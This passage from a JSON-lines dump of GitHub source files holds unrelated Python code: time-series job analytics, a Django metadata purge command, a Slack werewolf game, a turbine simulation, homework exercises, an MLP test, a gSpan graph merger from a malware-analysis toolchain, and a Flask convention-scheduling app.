only_completed:\n completed_jobs = [j for j in jobs if j.status == \"Completed\"]\n if len(completed_jobs) < len(jobs):\n c = Counter([j.status for j in jobs])\n d = dict(c)\n del d[\"Completed\"]\n logging.warning(\n \" Analysis is ignoring %d jobs %s\",\n len(jobs) - len(completed_jobs),\n d,\n )\n jobs = completed_jobs\n\n duplicates = []\n if resolve_duplicates:\n unique = {}\n for job in jobs:\n hyperparameters = frozenset(job.hyperparameters.items())\n if hyperparameters in unique:\n # Replace existing job if this one is newer. 
Don't do anything otherwise.\n if unique[hyperparameters].date_created < job.date_created:\n duplicates.append(unique[hyperparameters])\n unique[hyperparameters] = job\n else:\n duplicates.append(job)\n else:\n unique[hyperparameters] = job\n\n if len(unique) < len(jobs):\n logging.warning(\n \" Analysis is ignoring %d superseded jobs\",\n len(jobs) - len(unique),\n )\n jobs = list(unique.values())\n\n return jobs, duplicates\n\n\n# -------------------------------------------------------------------------------------------------\ndef _process_hyperparameter_value(v: str) -> str | float | int | bool:\n if re.match(r'^\"(.*)\"$', v): # value is a string\n return v[1:-1]\n if v in (\"false\", \"False\", \"true\", \"True\"):\n return v in (\"true\", \"True\")\n if \".\" in v: # value is float\n return float(v)\n return int(v) # value is int\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/tsbench/src/tsbench/evaluations/aws/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":14899,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"29374190985","text":"from collections import Counter\nfrom django.core.management.base import BaseCommand\n# from django.core.management.base import CommandError\n\nfrom library.models import Artist\nfrom library.models import Album\nfrom library.models import Track\nfrom library.models import MediaFile\nfrom library.models import Artwork\n\n\nclass Command(BaseCommand):\n help = 'Empty metadata'\n\n def add_arguments(self, parser):\n pass\n\n def handle(self, *args, **kwargs):\n self.stdout.write('deleting everything (except your music)')\n\n results = []\n results.append(Artist.objects.all().delete())\n results.append(Album.objects.all().delete())\n results.append(Track.objects.all().delete())\n results.append(MediaFile.objects.all().delete())\n results.append(Artwork.objects.all().delete())\n\n counter = Counter()\n for c in [Counter(r[1]) for r in results]:\n counter.update(c)\n\n longest_value = 1\n if counter.values():\n longest_value = len(str(max(counter.values())))\n\n for k in counter.keys():\n self.stdout.write(' {} {} {}'.format(\n self.style.ERROR('destroyed'),\n str(counter[k]).rjust(longest_value, ' '),\n k,\n ))\n","repo_name":"jordanribera/maru","sub_path":"api/src/library/management/commands/purge.py","file_name":"purge.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"19847779404","text":"import logging\nfrom ..text import Text\nfrom ..roles import WEREWOLF\nfrom .base import BaseCommand, match_agent\n\nLOG = logging.getLogger(__name__)\n\n\nclass SeerCommand(BaseCommand):\n def welcome(self, srv=None, game=None, role=None):\n srv.broadcast(channel=role.channel,\n text=Text(\"At night, you may chose someone to SCRY in your private channel.\\n\"\n \"You will determine if that person is a werewolf.\\n\"\n \"Evil humans are not detected.\"))\n\n def on_message(self, srv=None, game=None, role=None, channel=None, text=None):\n LOG.debug(\"SeerCommand examines: game=%s, role=%s, channel=%s, text=%s\", game, role, channel, text)\n if channel != role.channel:\n return\n\n scry = text.match(\"scry\", match_agent(game.players, any_agent=True))\n if scry is not None:\n target = scry[0]\n if not self.is_relevant(game=game):\n srv.broadcast(channel=channel, text=Text(\"You may not currently scry.\"))\n return True\n if target not in game.players:\n 
srv.broadcast(channel=channel, text=Text(target, \" isn't a valid scrying target.\"))\n return True\n srv.broadcast(channel=channel, text=Text(\"You chose to scry \", target))\n game.scratchpad.phase_actions.scry[role] = game.roles[target]\n return True\n\n def ready(self, srv=None, game=None):\n if game.current_phase.get('can_vote', False):\n return\n game.scratchpad.phase_actions.scry = {}\n\n def resolve(self, srv=None, game=None):\n if game.current_phase.get('can_vote', False):\n return\n\n for role, target in game.scratchpad.phase_actions.scry.items():\n if target is not None:\n if target.role.name == WEREWOLF:\n srv.broadcast(channel=role.channel,\n text=Text(\"During the night you scry \", target.player, \".\\n\",\n \"They are a werewolf!\"))\n else:\n srv.broadcast(channel=role.channel,\n text=Text(\"During the night you scry \", target.player, \".\\n\",\n \"They are not a werewolf.\"))\n","repo_name":"jan-g/slackwolf","sub_path":"werewolf/commands/seer.py","file_name":"seer.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40787635097","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri 11 May 2012\n\nTest response of rigid turbine structure to applied forces on an elastic\nfoundation, defined by a stiffness matrix.\n\n@author: Rick Lupton\n\"\"\"\n\nfrom __future__ import division\n\nimport numpy as np\nfrom numpy import pi, array, dot\nimport matplotlib.pylab as plt\nimport matplotlib.gridspec as gridspec\n\nimport dynamics\nfrom turbine import Turbine\n\n# Options\ndynamics.OPT_GRAVITY = True\ndynamics.OPT_GEOMETRIC_STIFFNESS = False\n\n# Create model\nbladed_file = r'C:\\Users\\Rick Lupton\\Dropbox\\phd\\Bladed\\Models\\OC3-Hywind_SparBuoy_NREL5MW.prj'\ntb = Turbine(bladed_file, rigid=False)\n\n# Set base motion\ntb.system.free(tb.base)\ntb.system.prescribe(tb.base, acc=0, vel=0, part=[0,1,2,3,5])\n\n# Define foundation matrix - no coupling for now\n# Choose to match appropriate frequencies of rigid-body motion (Karimirad & Moan, 2012)\n# in surge, sway, heave, roll, pitch yaw respectively\nrigid_body_freqs = array([0.05, 0.05, 0.20, 0.22, 0.22, 0.84]) **2\nfoundation = np.diag([\n tb.mass * rigid_body_freqs[0],\n tb.mass * rigid_body_freqs[1],\n tb.mass * rigid_body_freqs[2],\n tb.inertia[0,0] * rigid_body_freqs[3],\n tb.inertia[1,1] * rigid_body_freqs[4],\n tb.inertia[2,2] * rigid_body_freqs[5] + 100\n])\ntb.base.stiffness = foundation*1000\n\n# Parameters\nrotor_speed = 2\nt = np.arange(0, 90, 0.25)\n\n# Linearise model and make MBC version\n#lin = tb.lin(az0=0, rotor_speed=rotor_speed, init=False)\n#mbclin = lin.multiblade_transform((0, rotor_speed), [range(0,4),range(4,8),range(8,12)])\n\n# Set initial pitch deflection and simulate\nz0 = np.zeros(13)\nz0[0] = 0.3\n#yl = lin.integrate(t, z0)\n#ym = mbclin.integrate(t, z0)\n\n# Simulate original full system\ntb.base_motion = 4\ntb.base_motion_amp = 0.3\ntt,y = tb.simulate(t1=90, dt=0.25, rotor_speed=rotor_speed, init=False)\n\n\ndef mbc(az, u):\n N = len(az)\n B = array([\n np.ones((3,N)),\n [2*np.cos(az), 2*np.cos(az+2*pi/3), 2*np.cos(az+4*pi/3)],\n [2*np.sin(az), 2*np.sin(az+2*pi/3), 2*np.sin(az+4*pi/3)],\n ]) / 3\n u = array(u)\n z = np.einsum('zbt,btj->jzt', B, u)\n return z\n\ndef p(parts=False):\n fig = plt.figure()\n fig.set_size_inches(15,10,forward=True)\n gs = gridspec.GridSpec(4, 1)\n \n az = y[1][:,0]\n z = mbc(az, y[2:5])\n \n ax = None\n for imode in range(4):\n ax = fig.add_subplot(gs[imode,0], 
sharex=ax)\n        ax.plot(t,y[2][:,imode],'k',alpha=0.8)\n        ax.plot(t,y[3][:,imode],'k',alpha=0.4)\n        ax.plot(t,y[4][:,imode],'k',alpha=0.2)\n        ax.plot(t,z[imode].T)\n        for i in np.nonzero(np.diff(az) < 0)[0]:\n            ax.axvline(t[i], alpha=0.1)\n        ax.axhline(0, alpha=0.1)\n        ax.set_title(tb.modes.mode_descriptions[imode])\n        #ax1.legend(frameon=False, loc='upper left')\n        #plt.setp(ax1.get_legend().get_texts(), fontsize='small')\n\n    ax.set_xlabel('Time / s')\n","repo_name":"ricklupton/mbwind","sub_path":"examples/forced-base-motion/test-turbine-foundation.py","file_name":"test-turbine-foundation.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"19826840437","text":"from django import template\nfrom django.utils.safestring import mark_safe\nimport nation.variables as v\n\nregister = template.Library()\n\ndef align(text, nation):\n    if nation.alignment == 1:\n        toreturn = 'ussr.png'\n    elif nation.alignment == 2:\n        toreturn = 'neutral.png'\n    else:\n        toreturn = 'us.png'\n    return mark_safe(text + toreturn)\n\nregister.filter('align', align)\n\n\ndef offerdisplay(offer):\n    # map the offer's alignment to its icon ('alignment' on the offer is an\n    # assumption; the original body reused undefined names from align())\n    if offer.alignment == 1:\n        toreturn = 'ussr.png'\n    elif offer.alignment == 2:\n        toreturn = 'neutral.png'\n    else:\n        toreturn = 'us.png'\n    return mark_safe(toreturn)\n\nregister.filter('offerdisplay', offerdisplay)\n\n\ndef tariff(offer, player):\n    return offer.tariff * offer.request_amount\n\nregister.filter('tariff', tariff)\n\n\ndef offerformat(amount, offertype):\n    return mark_safe(v.pretty(amount, offertype, True))\n\nregister.filter('offerformat', offerformat)","repo_name":"argiepras/Coco","sub_path":"templatetags/markettags.py","file_name":"markettags.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"20608573205","text":"import msvcrt\nimport math\nimport sympy\nimport random\n\n\n# ---------------------------------------------------------------------\n\nprint('\\n1. Compute the number with the given precision d.\\nExample:' +\n      '\\nfor d = 0.001, π = 3.141\\n10^{-1} ≤ d ≤ 10^{-10}' +\n      '\\nSolution:')\n\nd = input()\naccur = len(d)\nprint(str(math.pi)[0:accur])\n\n\n# ---------------------------------------------------------------------\n\n\nprint('\\n2. Specify a natural number N. Write a program that ' +\n      'builds the list of prime factors of the number N.' +\n      '\\nSolution:')\n\nn = int(input())\nsome_list = []\nfor i in range(1, n + 1):\n    if n % i == 0:\n        for j in range(2, i // 2 + 1):\n            if i % j == 0:\n                break\n        else:\n            some_list.append(i)\nprint(*some_list, sep=', ')\n\n\n# ---------------------------------------------------------------------\n\n\nprint('\\n3. Specify a sequence of numbers. Write a program that prints ' +\n      'the list of non-repeating elements of the original sequence.' +\n      '\\nSolution:')\n\n# First solution:\n\nnumber_set = set()\nout_list = []\nsome_list = list(map(int, input().split()))\nfor ind in range(0, len(some_list)):\n    if some_list[ind] not in number_set:\n        number_set.add(some_list[ind])\n        for ind1 in range(ind + 1, len(some_list)):\n            if some_list[ind] == some_list[ind1]:\n                break\n        else:\n            out_list.append(some_list[ind])\nprint(out_list)\n\n\n# Second solution:\n\nsome_list = list(map(int, input().split()))\nfor i in some_list:\n    if some_list.count(i) == 1:\n        print(i, end=' ')\n\n\n# ---------------------------------------------------------------------\n","repo_name":"mafik-tolik/PythonLesson4","sub_path":"AnalysisOfHomework.py","file_name":"AnalysisOfHomework.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"40710770966","text":"import os\nfrom matplotlib import pyplot as plt\n\nfrom WorkEnv import WorkEnvironment\n\ndef MLPClassifierTest():\n    we = WorkEnvironment()\n\n    out_path = 'outputs/mlp/'\n    os.makedirs(out_path, exist_ok=True)\n\n    # Create XY Data from CSV\n    data_dimension = 2\n    we.add_op(op_key='CSV_XY_DataOp', params={\n        'path': 'data/2d_400_cluster.csv',\n        'data_obj_name': 'hw',\n        'X_columns': [str(i) for i in range(data_dimension)],\n        'Y_column': ['centroid'],\n    })\n    we.run_op(op_index=0)\n\n    # Shuffle the imported data\n    we.add_op(op_key='DataShuffleOp', params={\n        'data_object_op': 0,\n    })\n    we.run_op(op_index=1)\n\n    # Plot data on a scatter plot\n    we.add_op(op_key='ScatterPlotOp', params={\n        'data_object_op': 1,\n    })\n    ret_val = we.run_op(op_index=2)\n    if 'plot' in ret_val:\n        ret_val['plot'].savefig(\n            os.path.join(out_path, 'data_scatter.png')\n        )\n
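\n    # Ops are chained by run index: params such as 'data_object_op',\n    # 'associated_data_op' and 'model_object_op' refer to the earlier op\n    # whose output feeds the current stage (added note, not original).\n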
    # Class index to one hot vector,\n    # e.g. (2 -> [0,0,1])\n    we.add_op(op_key='LabelsToOneHotOp', params={\n        'data_object_op': 1,\n    })\n    we.run_op(op_index=3)\n\n    # Create the MLP Model\n    we.add_op(op_key='MLPClassifier_ModelOp', params={\n        'model_name': 'mlp',\n        'associated_data_op': 3,\n        'in_units': 2, 'out_units': 2,\n        'hidden_sizes': [4]\n    })\n    we.run_op(op_index=4)\n\n    # Create trainer for model\n    we.add_op(op_key='MLPClassifier_TrainOp', params={\n        'model_object_op': 4,\n        'lr': 0.01, 'epoch': 100, 'batch_size': 32\n    })\n    we.run_op(op_index=5)\n\n    # Visualize model training loss\n    we.add_op(op_key='MLPClassifier_VisualizeOp', params={\n        'model_object_op': 5,\n        'option':'loss',\n    })\n    ret_val = we.run_op(op_index=6)\n    if 'plot' in ret_val:\n        ret_val['plot'].savefig(\n            os.path.join(out_path, 'loss_plot.png')\n        )\n\n    # Visualize the model's decision boundary\n    we.add_op(op_key='MLPClassifier_VisualizeOp', params={\n        'model_object_op': 5,\n        'option':'decision',\n    })\n    ret_val = we.run_op(op_index=7)\n    if 'plot' in ret_val:\n        ret_val['plot'].savefig(\n            os.path.join(out_path, 'boundary_plot.png')\n        )\n\n\nif __name__ == \"__main__\":\n    MLPClassifierTest()","repo_name":"cahity/Ceres","sub_path":"ceres/externals/MLlib/testing/mlp_classifier.py","file_name":"mlp_classifier.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"3171662550","text":"#!/usr/bin/env python3\nimport glob,os\nimport argparse\nfrom GraphBuilder import *\n\n\nclass MergeGspan:\n    def __init__(self):\n        pass\n\n    def run(self):\n        parser = argparse.ArgumentParser()\n        parser.add_argument(\"--out\", help=\"Name of the output file\")\n        parser.add_argument(\"--c\", help=\"create gspan file from SCDG\",type=bool)\n        parser.add_argument(\"dir\", help=\"directory with gspan files to merge\")\n        parser.add_argument(\"--fam\",help=\"malware family\",default=\"stub\")\n        args = parser.parse_args()\n\n        if args.out:\n            out = args.out\n        else:\n            out = 'SCDG_mirai_global.gs'\n\n        os.chdir(args.fam)\n\n        if args.c :\n            for file in glob.glob(\"*SCDG.txt\") :\n                data = []\n                f = open(file,'r')\n                for line in f:\n                    #print(string)\n\n                    a = line.replace('\\n','')\n                    b = a.replace('\\t','')\n                    c = b.strip()\n                    d = c.replace(\"<\",\"'<\").replace(\">\",\">'\").replace(\"'<=\",\"<=\").replace(\">' \",\"> \").replace(\"''\",\"'\")\n                    data.append(eval(d))\n                f.close()\n                g = GraphBuilder(name=file,mapping='../res/mapping.txt',merge_call=True,comp_args=False,min_size=0,ignore_zero=True,odir='../../'+args.fam+'_gs',get_info=False)\n                g.build_graph(data)\n\n        print(args.fam)\n        print(args.dir)\n\n        os.chdir('../'+args.dir)\n        id_graph = 0\n        res = open(out,'w')\n\n        for file in glob.glob(\"*.gs\") :\n            print(file)\n            f = open(file,'r')\n            fstat = os.stat(file)\n            if fstat.st_size > 150 :\n                for line in f :\n                    if 't #' in line:\n                        res.write('t # '+str(id_graph)+'\\n')\n                        id_graph += 1\n                    else :\n                        res.write(line)\n                f.close()\n        res.close()\n","repo_name":"csvl/SEMA-ToolChain","sub_path":"script/MergeGspan.py","file_name":"MergeGspan.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"}
+{"seq_id":"26251994265","text":"from collections import deque\n\nR, C = map(int, input().split())\nsy, sx = map(int, input().split())\ngy, gx = map(int, input().split())\nc = [list(input()) for _ in range(R)]\n\nMAX = 10**29\ndp = [MAX] * (R*C)\n\nq = deque()\nq.append((sx-1, sy-1))\ndp[(sx-1) * C + sy-1] = 0\n\nwhile len(q) >= 1:\n    pos = q.popleft()\n    pos_i = (pos[0]) * C + 
pos[1]\n\n poses = [\n (pos[0]+1, pos[1]),\n (pos[0], pos[1]+1),\n (pos[0]-1, pos[1]),\n (pos[0], pos[1]-1)\n ]\n\n for to in poses:\n to_i = to[0] * C + to[1]\n\n if dp[to_i] == MAX and c[to[0]][to[1]] != \"#\":\n dp[to_i] = min(dp[pos_i] + 1, dp[to_i])\n q.append(to)\n\n # print(len(q))\n# print(dp)\n# for i in range(0, R*C, C):\n# print(dp[i:i+C])\nprint(dp[(gy-1) * C + gx-1])\n\n","repo_name":"ryuki999/atcoder","sub_path":"other_contest/kyopro-tessoku/ch09/b63.py","file_name":"b63.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41710512353","text":"def getLine(start, end):\n \"\"\"\n DDA Algorithm\n Produces a list of tuples/pixels (x,y) to be printed\n \"\"\"\n # Setting up initial values\n points = []\n x1, y1 = start\n x2, y2 = end\n dx = x2 - x1\n dy = y2 - y1\n\n # Calculating the number of interations\n iter = abs(dx) if abs(dx) > abs(dy) else abs(dy)\n\n # Increment has to be 1 or -1 in the right axis\n x_inc = dx/iter\n y_inc = dy/iter\n\n # Getting initial point\n x = x1\n y = y1\n\n # Iterating to generate points of the line\n points.append((x,y))\n for i in range(0, iter):\n x += x_inc\n y += y_inc\n points.append((round(x),round(y)))\n\n return points","repo_name":"vinacovre/computerGraphics","sub_path":"Final Project (API)/dda.py","file_name":"dda.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13786007031","text":"import json\nfrom learn.file_loader import load\n\n\n_OCCURENCES_PATH = '/home/ubuntu/Notebooks/Project/EPIK_Solution/all_data/extracted/transformed/Occurrences/'\n_OCCURENCES = load(_OCCURENCES_PATH)\n\ndef transform_nb_photos(j_son):\n if isinstance(j_son, str):\n temp = json.loads(j_son)\n num_photos = 0\n for k,v in temp.items():\n num_photos += int(k)\n return num_photos\n else:\n return 0\n \n \ndef transform_photos_surface(j_son):\n if isinstance(j_son, str):\n temp = json.loads(j_son)\n photos_surface = 0\n for k,v in temp.items():\n photos_surface += int(k) * (v['w'] * v['h'])\n return photos_surface\n else:\n return 0\n\n\ndef title_transformation(row):\n temp_cat = row['category_id']\n temp_period = row['period']\n temp_title = row['title']\n \n for occ in _OCCURENCES[(_OCCURENCES['period'] == temp_period) & \n (_OCCURENCES['category_id'] == temp_cat)]['phrase']:\n if occ in temp_title.lower():\n return 1\n return 0\n\n\ndef description_transformation(description):\n pass\n","repo_name":"Kotuzo/EPIK_Solution","sub_path":"src/learn/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6014731621","text":"import bcrypt\nimport binascii\ntry:\n from urllib.request import urlretrieve\n from urllib.parse import urlparse\nexcept ImportError:\n from urllib import urlretrieve\n from urlparse import urlparse\nimport os\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport json\nimport datetime\nfrom collections import defaultdict\n\nfrom app import app\nfrom app import db\nfrom app.models import Convention, Event, Track, Room, RoomGroup, Timeslot, DataLoadError\nfrom app.models import User\nfrom flask import jsonify, request, render_template, url_for, redirect, session, abort\nfrom flask.ext.login import LoginManager, login_required\nfrom flask.ext.login import login_user, 
logout_user, current_user\nfrom wtforms import Form, StringField\nfrom wtforms.validators import DataRequired\nfrom sqlalchemy.orm.exc import MultipleResultsFound\nfrom sqlalchemy.exc import SQLAlchemyError\n\nimport refresh_data\n\n# Set up logging.\nif not app.debug:\n if 'APP_ROOT' in app.config:\n log_fname = os.path.join(app.config['APP_ROOT'], 'crem.log')\n else:\n log_fname = 'crem.log'\n filehandler = logging.handlers.RotatingFileHandler(log_fname, 'a',\n 100000, 10)\n filehandler.setLevel(logging.INFO)\n filehandler.setFormatter(logging.Formatter(\n '%(asctime)s %(process)-6s %(levelname)-8s: %(funcName)s: %(message)s'))\n app.logger.addHandler(filehandler)\n app.logger.setLevel(logging.INFO)\n\n\ndef generate_csrf_token():\n \"\"\"\n Generate a CSRF token that can be included in forms, and checked in\n methodes which accept POST data.\n \"\"\"\n if '_csrf_token' not in session:\n session['_csrf_token'] = binascii.hexlify(os.urandom(24))\n return session['_csrf_token']\n\napp.jinja_env.globals['csrf_token'] = generate_csrf_token\n\n\n# Setup security.\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n\n@login_manager.user_loader\ndef user_loader(user_id):\n try:\n return User.query.get(user_id)\n except SQLAlchemyError as e:\n app.logger.error('Unable to query for user in user_loader(): %s' % e)\n abort(500)\n\n\nclass LoginForm(Form):\n username = StringField('username', validators=[DataRequired()])\n password = StringField('password', validators=[DataRequired()])\n\n\nclass ImportForm(Form):\n source_url = StringField('source_url', validators=[DataRequired()])\n\n\ndef jsdate2py(s):\n \"\"\"\n Converts a string to a Python datetime object. Returns None if the string\n cannot be converted. An example of the string is:\n\n 2016-4-29T:20\n \"\"\"\n try:\n parts = s.strip().split('T:')\n dateparts = parts[0].split('-')\n year = int(dateparts[0])\n month = int(dateparts[1])\n day = int(dateparts[2])\n hour = int(parts[1])\n except Exception:\n return None\n return datetime.datetime(year, month, day, hour, 0, 0)\n\n\n@app.route('/')\ndef root():\n return app.send_static_file('index.html')\n\n\n@app.route('/convention.json', methods=['GET', 'POST'])\ndef convention():\n if request.method == 'GET':\n conventions = Convention.query.all()\n return jsonify(configs = [i.configs for i in conventions])\n else:\n content = request.json\n try:\n convention = Convention.query.one()\n except MultipleResultsFound:\n # Error: there should be one and only one convention record.\n return ('There is more than one convention record.', 500)\n convention.name = content['name']\n\n # Convert the start date to a Python datetime object.\n start_dt = jsdate2py(content['start_dt'])\n if start_dt is None:\n return ('Unable to parse the convention start date.', 500)\n convention.start_dt = start_dt\n\n # Convert the timeslot length from minutes to a timedelta object.\n convention.timeslot_length = datetime.timedelta(0, int(content['timeslot_length']) * 60)\n\n convention.number_of_timeslots = content['number_of_timeslots']\n\n # Update the database.\n try:\n db.session.add(convention)\n db.session.commit()\n except SQLAlchemyError as e:\n return ('Error updating the convention record: %s' % e, 500)\n return ('Convention data successfully updated.', 200)\n\n@app.route('/number_of_timeslots.json')\ndef number_of_timeslots():\n number_of_timeslots = Timeslot.query.count()\n return jsonify(number_of_timeslots = number_of_timeslots)\n\n@app.route('/tracks.json')\ndef tracks():\n tracklist = 
Track.query.all()\n    return jsonify(tracknames = [i.names for i in tracklist])\n\n@app.route('/columns.json')\ndef columns():\n    return jsonify(\n        columns = {\n            'eventnumber': {'id':'eventnumber','name':'#',},\n            'title': {'id':'title','name':'Title',},\n            'track': {'id':'track','name':'Track',},\n            'start': {'id':'start','name':'Start',},\n            'duration': {'id':'duration','name':'Duration',},\n            'rooms': {'id':'rooms','name':'Room',},\n            'type': {'id':'type','name':'Type',},\n            'presenters': {'id':'presenters','name':'Program Participants',},\n            'resources': {'id':'resources','name':'Resources',},\n            'description': {'id':'description','name':'Description',},\n            'comments': {'id':'comments','name':'Staff Comments',},\n            'conflict': {'id': 'conflict','name':'Conflict',}\n        })\n\n@app.route('/eventlist.json')\ndef events():\n    events = Event.query.all()\n\n    # Index events by ID, prepare for conflict annotation\n    events_by_id = {}\n    for event in events:\n        data = event.useroutput\n        data['conflict'] = \"OK\"\n        events_by_id[event.id] = data\n\n    # Collate events by timeslot+presenter and timeslot+room\n    events_by_timeslot_and_presenter = defaultdict(list)\n    events_by_timeslot_and_room = defaultdict(list)\n    for event in events:\n\n        # Ignore inactive events\n        if not event.active:\n            continue\n\n        # Scan all timeslots for the event\n        for timeslot in event.timeslots:\n\n            # Collect this event into a timeslot:presenter bucket\n            for presenter in event.presenters:\n                key = '%s:%s' % (timeslot.id, presenter.id)\n                events_by_timeslot_and_presenter[key].append(event.id)\n\n            # Collect this event into a timeslot:room bucket\n            for room in event.rooms:\n                key = '%s:%s' % (timeslot.id, room.id)\n                events_by_timeslot_and_room[key].append(event.id)\n\n    # Annotate events with presenter conflicts\n    for key, event_ids in list(events_by_timeslot_and_presenter.items()):\n        # If this timeslot & presenter appears in multiple events, all those\n        # events are in conflict.\n        if len(event_ids) > 1:\n            for event_id in event_ids:\n                events_by_id[event_id]['conflict'] = \"Participant\"\n\n    # Annotate events with room conflicts\n    for key, event_ids in list(events_by_timeslot_and_room.items()):\n        # If this timeslot & room appears in multiple events, all those\n        # events are in conflict.\n        if len(event_ids) > 1:\n            for event_id in event_ids:\n                if events_by_id[event_id]['conflict'] == \"Participant\":\n                    events_by_id[event_id]['conflict'] += \" Room\"\n                else:\n                    events_by_id[event_id]['conflict'] = \"Room\"\n\n    return jsonify(eventlist = list(events_by_id.values()))\n\n@app.route('/rooms.json', methods=['GET', 'POST'])\ndef rooms():\n    if request.method == 'GET':\n        roomlist = Room.query.all()\n        return jsonify(rooms=[i.ui_rooms for i in roomlist])\n    else:\n        rooms = request.json\n        for room in rooms:\n            if 'id' not in room:\n                db_room = Room()\n            else:\n                db_room = Room.query.get(room['id'])\n            db_room.room_name = room['name']\n            db_room.room_sq_ft = room['sq_ft']\n            db_room.room_capacity = room['capacity']\n            db_room.room_group_id = room['group_id']\n            db.session.add(db_room)\n\n        # Update the database.\n        try:\n            db.session.commit()\n        except SQLAlchemyError as e:\n            return ('Error updating the room records: %s' % e, 500)\n        return ('Room configs successfully updated.', 200)\n\n@app.route('/room_groups.json')\ndef room():\n    roomgrouplist = RoomGroup.query.all()\n    return jsonify(\n        room_groups = [i.ui_room_groups for i in roomgrouplist],\n    )\n\n@app.route('/configs.json')\ndef combined_info():\n    convention = Convention.query.first()\n    tracks = Track.query.all()\n    rooms = Room.query.all()\n    room_groups = RoomGroup.query.all()\n    return jsonify(\n        {\n            \"convention\": {\n                \"name\": convention.name,\n                \"start_dt\": convention.start_dt.strftime(convention.datetime_format),\n                \"timeslot_length\": int(convention.timeslot_duration.total_seconds()/60),\n                \"number_of_timeslots\": convention.number_of_timeslots,\n            },\n            \"tracks\": [i.names for i in tracks],\n            \"rooms\": [{\"name\": i.room_name,\n                       \"capacity\": i.room_capacity,\n                       \"sq_ft\": i.room_sq_ft,\n                       \"group_id\": i.room_group_id,\n                       \"id\": i.id,\n                       # TODO: rename this to bookings and make values returned useful.\n                       \"available_timeslots\": [{\"name\": j.timeslot.name,\n                                                \"index\": j.timeslot.timeslot_index\n                                                }\n                                               for j in i.bookings],\n                       \"suitable_events\": [{\"id\": j.id,\n                                            \"title\": j.title\n                                            }\n                                           for j in i.suitable_events]\n                       }\n                      for i in rooms],\n            \"room_groups\": [i.ui_room_groups for i in room_groups]\n        }\n    )\n\n\n@app.route('/refresh-database', methods=['GET', 'POST'])\n@login_required\ndef refresh_database():\n    error = None\n    form = ImportForm(request.form)\n    if request.method == 'POST' and form.validate():\n        # Check the CSRF token.\n        token = session.pop('_csrf_token', None)\n        if not token or token != request.form.get('_csrf_token'):\n            abort(403)\n\n        url = form.source_url.data.strip()\n        if not url:\n            app.logger.info('No URL specified')\n            error = 'The URL for schedule document was not specified'\n        else:\n            app.logger.info('The user specified the URL %s' % url)\n\n            # Make sure the URL has the right suffix to export in CSV form.\n            urlparts = urlparse(url)\n            path = urlparts.path\n            if path.lower().endswith('/pub'):\n                path = path[:-4]\n            elif path.endswith('/'):\n                path = path[:-1]\n            newurl = '%s://%s%s/pub?output=csv' % (urlparts.scheme, urlparts.netloc,\n                                                   path)\n            app.logger.info('The new URL is %s' % newurl)\n\n            try:\n                result = urlretrieve(newurl)\n            except Exception as e:\n                error = 'Unable to read the schedule document: %s' % e\n            else:\n                # Refresh the database and delete the temporary export file.\n                fname = result[0]\n                refresh_data.refresh_data(fname)\n                os.remove(fname)\n\n                # Show any errors which occurred.\n                return redirect('/show-database-errors')\n    return render_template('refresh_database.html', form=form, error=error)\n\n\n@app.route('/show-database-errors')\n@login_required\ndef show_database_errors():\n    # Display errors and warnings that occurred when refreshing the database.\n    load_errors = DataLoadError.query.order_by(DataLoadError.line_num).all()\n    
return render_template('load_errors.html', load_errors=load_errors)\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n error = None\n form = LoginForm(request.form)\n if request.method == 'POST' and form.validate():\n # Check the CSRF token.\n token = session.pop('_csrf_token', None)\n if not token or token != request.form.get('_csrf_token'):\n abort(403)\n\n try:\n user = User.query.get(form.username.data)\n except SQLAlchemyError as e:\n app.logger.error('Unable to query for user in login(): %s' % e)\n abort(500)\n password = form.password.data\n if user and bcrypt.hashpw(password.encode('utf-8'), user.encpwd.encode('utf-8')).decode() == user.encpwd:\n user.authenticated = True\n db.session.add(user)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n app.logger.error('Unable to commit user authentication in login(): %s' % e)\n abort(500)\n login_user(user, remember=True)\n return redirect('/')\n else:\n error = 'the user name or password are incorrect.'\n return render_template('login.html', form=form, error=error)\n\n\n@app.route('/logout/', methods=[\"GET\"])\ndef logout():\n user = current_user\n if user.get_id():\n user.authenticated = False\n db.session.add(user)\n try:\n db.session.commit()\n except SQLAlchemyError as e:\n app.logger.error('Unable to commit user authentication in logout(): %s' % e)\n abort(500)\n logout_user()\n return redirect('/')\n","repo_name":"MattArnold/CREM","sub_path":"app/routes/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":13873,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"18750178756","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom google.appengine.ext import db\nfrom datetime import datetime\nimport feedparser\n\nimport logging\n\nTWITTER_FAV_URL_FORMAT = 